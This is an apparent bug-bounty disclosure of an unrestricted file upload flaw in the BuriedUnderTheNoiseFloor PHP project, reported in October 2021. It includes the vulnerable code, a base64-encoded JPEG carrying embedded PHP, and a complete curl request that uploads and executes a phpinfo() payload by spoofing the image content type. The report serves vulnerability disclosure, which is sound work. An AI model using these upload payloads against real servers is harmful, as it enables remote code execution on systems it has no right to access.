Unrestricted Upload of File with Dangerous Type in jspark311/buriedunderthenoisefloor
Reported on
Oct 13th 2021
Description
Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed.
https://github.com/jspark311/BuriedUnderTheNoiseFloor/ is vulnerable to remote code execution via Unrestricted Upload of File with Dangerous Type as shown below:
Proof of concept
Vuln variable: $_FILES['upfile']
Snippet:
if (isset($_FILES) && isset($_FILES['upfile'])) {
if ($_FILES['upfile']['error'] == 0) {
if (in_array($_FILES['upfile']['type'], $allowed)) {
$extension = end(explode('.', $_FILES['upfile']['name']));
$file_path = 'uploads/'.hash('sha256', $_FILES['upfile']['tmp_name'].time()).'.'.$extension;
if (move_uploaded_file($_FILES['upfile']['tmp_name'], $file_path)) {
$img = file_get_contents($file_path);
$state = 1;
...
BuriedUnderTheNoiseFloor validates the uploaded file type, but doesnt validate the extension allowing to perform remote code execution as shown next:
Payload
Method1:
Generate a valid jpg image with embed php code at the end of it , for example in a terminal decode a base64 image:
echo '/9j/4AAQSkZJRgABAQEAYABgAAD/2wBDAAgGBgcGBQgHBwcJCQgKDBQNDAsLDBkSEw8UHRofHh0aHBwgJC4nICIsIxwcKDcpLDAxNDQ0Hyc5PTgyPC4zNDL/2wBDAQkJCQwLDBgNDRgyIRwhMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjL/wAARCAABAAEDASIAAhEBAxEB/8QAHwAAAQUBAQEBAQEAAAAAAAAAAAECAwQFBgcICQoL/8QAtRAAAgEDAwIEAwUFBAQAAAF9AQIDAAQRBRIhMUEGE1FhByJxFDKBkaEII0KxwRVS0fAkM2JyggkKFhcYGRolJicoKSo0NTY3ODk6Q0RFRkdISUpTVFVWV1hZWmNkZWZnaGlqc3R1dnd4eXqDhIWGh4iJipKTlJWWl5iZmqKjpKWmp6ipqrKztLW2t7i5usLDxMXGx8jJytLT1NXW19jZ2uHi4+Tl5ufo6erx8vP09fb3+Pn6/8QAHwEAAwEBAQEBAQEBAQAAAAAAAAECAwQFBgcICQoL/8QAtREAAgECBAQDBAcFBAQAAQJ3AAECAxEEBSExBhJBUQdhcRMiMoEIFEKRobHBCSMzUvAVYnLRChYkNOEl8RcYGRomJygpKjU2Nzg5OkNERUZHSElKU1RVVldYWVpjZGVmZ2hpanN0dXZ3eHl6goOEhYaHiImKkpOUlZaXmJmaoqOkpaanqKmqsrO0tba3uLm6wsPExcbHyMnK0tPU1dbX2Nna4uPk5ebn6Onq8vP09fb3+Pn6/9oADAMBAAIRAxEAPwD3+iiigD//2Qo8P3BocCBwaHBpbmZvKCk7Pz4K' | base64 -d > test2.php
Select this test2.php image
Intercept the request with a proxy and change the Content type to Content-Type: image/jpg
Go to uploads directory http://localhost/BuriedUnderTheNoiseFloor-master/uploads/ and select the new php created file
Observe the phpinfo() function is executed
Method2:
In a terminal, with curl send a forged petition (php script with a img content type) in this example the path is http://localhost/BuriedUnderTheNoiseFloor-master/
curl -i -s -k -X $'POST' -H $'Host: localhost' -H $'Content-Type: multipart/form-data; boundary=---------------------------13655746569274249392023872903' -H $'Content-Length: 238' -H $'Connection: close' --data-binary $'-----------------------------13655746569274249392023872903\x0d\x0aContent-Disposition: form-data; name=\"upfile\"; filename=\"test2.php\"\x0d\x0aContent-Type: image/jpg\x0d\x0a\x0a<?php phpinfo();?>\x0a\x0d\x0a-----------------------------13655746569274249392023872903--\x0d\x0a' http://localhost/BuriedUnderTheNoiseFloor-master/form.php
Go to uploads directory http://localhost/BuriedUnderTheNoiseFloor-master/uploads/ and select the new php created file
Observe phpinfo() function is executed
Impact
The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.
This has been fixed by ensuring the PHP execution policy is disable for the upload directory on the webserver.